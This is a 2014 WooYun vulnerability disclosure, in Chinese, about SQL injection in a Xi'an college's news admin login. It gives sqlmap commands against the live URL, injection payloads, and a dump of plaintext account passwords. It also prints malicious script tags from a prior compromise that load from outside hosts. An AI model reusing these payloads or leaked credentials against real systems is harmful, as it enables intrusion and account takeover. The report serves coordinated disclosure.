当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-072903

漏洞标题:西安某学院新闻管理后台SQL注入漏洞&后台可登陆&疑似已被入侵

相关厂商:西安航空学院

漏洞作者: 汪小弟

提交时间:2014-08-18 19:01

修复时间:2014-10-02 19:04

公开时间:2014-10-02 19:04

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-08-18: 细节已通知厂商并且等待厂商处理中
2014-08-22: 厂商已经确认,细节仅向厂商公开
2014-09-01: 细节向核心白帽子及相关领域专家公开
2014-09-11: 细节向普通白帽子公开
2014-09-21: 细节向实习白帽子公开
2014-10-02: 细节向公众公开

简要描述:

RT

详细说明:

1、可成功登录后台,并修改新闻内容

1.JPG


2、查看数据库内容,发现疑似入侵痕迹

13.JPG

漏洞证明:

1、找到管理员后台
http://www.xihangzh.com/manager/Default.asp
2、尝试自动注入测试,使用--data参数提交post数据

sqlmap.py -u "http://www.xihangzh.com/manager/Default.asp" --data="username=12&pass=12"


结果如下,username、password(测试过程忽略了对password参数的测试)可注入,可获取到数据库信息、系统信息、IIS信息等等。

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: username
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: username=12' AND 6473=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(
101)+CHAR(119)+CHAR(113)+(SELECT (CASE WHEN (6473=6473) THEN CHAR(49) ELSE CHAR(
48) END))+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113)+CHAR(113))) AND 'rUIB'='rUIB&U
serpass=12
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: username=12'; WAITFOR DELAY '0:0:5'--&Userpass=12
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: username=12' WAITFOR DELAY '0:0:5'--&Userpass=12
---
[16:07:31] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[16:07:31] [INFO] fetched data logged to text files under '\.sqlmap\output\www.xihangzh.com'


3、进一步获取数据库、表信息等等

sqlmap.py -u "http://www.xihangzh.com/manager/Default.asp" --data="username=12&pass=12" --current-db --current-user


获取到db和user信息

current user:    'xhnews'
[16:13:19] [INFO] fetching current database
[16:13:19] [INFO] resumed: xhnews
current database:    'xhnews'


获取当前数据库中的表信息:

sqlmap.py -u "http://www.xihangzh.com/manager/Default.asp" --data="username=12&pass=12" -D "xhnews" --tables


Database: xhnews
[18 tables]
+----------------------------+
| VideoNews                  |
| dtproperties               |
| gonggao                    |
| itemnews                   |
| jishu                      |
| news                       |
| newsuser                   |
| sysconstraints             |
| syssegments                |
| xhnews.D99_CMD             |
| xhnews.D99_Tmp             |
| xhnews.jiaozhu             |
| xhnews.kill_kk             |
| xhnews.pangolin_test_table |
| xhnews.sysfile1            |
| xhnews.systree             |
| xhnews.t_jiaozhu           |
| xhnews.xl                  |
+----------------------------+


4、dump表内容,

sqlmap.py -u "http://www.xihangzh.com/manager/Default.asp" --data="username=12&pass=12" -D "xhnews" -T "newsuser" --dump


获取到用户名和账号信息,密码明文保存,无须破解。同时看看userright试试admin权限账号登陆后台http://www.xihangzh.com/manager/Default.asp

Database: xhnews
Table: newsuser
[5 entries]
+--------+----------------------+----------------------+----------------------+
| UserID | UserName             | UserPass             | UserRight            |
+--------+----------------------+----------------------+----------------------+
| 10     | ckj                  | ckj                  | user                 |
| 11     | gckj                 | gckj                 | user                 |
| 4      | wl                   | 92832523             | admin                |
| 8      | rgkj                 | rgkj                 | user                 |
| 9      | dpjkj                | dpjkj                | user                 |
+--------+----------------------+----------------------+----------------------+


5、看以下几个表的名字

| xhnews.D99_CMD             |
| xhnews.D99_Tmp             |
| xhnews.jiaozhu             |
| xhnews.kill_kk             |
| xhnews.pangolin_test_table |
| xhnews.sysfile1            |
| xhnews.systree             |
| xhnews.t_jiaozhu           |
| xhnews.xl                  |


有些已被入侵的怀疑,尤其是这个pangolin明显是至少已经有人测试过的痕迹,选一个表看一下“xhnews.jiaozhu ”

Table: xhnews.jiaozhu
[16 entries]
+-------------------------------------------------------------------------------
------+-------------------------------------------------------------------------
------------+-------------------------------------------------------------------
------------------+
| DirAtt
      | DirName
            | DirFile
                  |
+-------------------------------------------------------------------------------
------+-------------------------------------------------------------------------
------------+-------------------------------------------------------------------
------------------+
| 1<script src=http://3b3.org/c.</title>"><script src=http://a.ll8cc.cn></script
><!-- | ahcmd<script src=http://3b3.or</title>"><script src=http://a.ll8cc.cn></
script><!-- | 1<script src=http://3b3.org/c.</title>"><script src=http://a.ll8cc
.cn></script><!-- |

修复方案:

1、后台不要对外
2、从IIS版本看也比较低,也需要关注系统及平台的安全设置
3、需要sql注入的防护
4、密码加密存储,禁止弱口令

版权声明:转载请注明来源 汪小弟@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2014-08-22 08:19

厂商回复:

通知用户处理中

最新状态:

暂无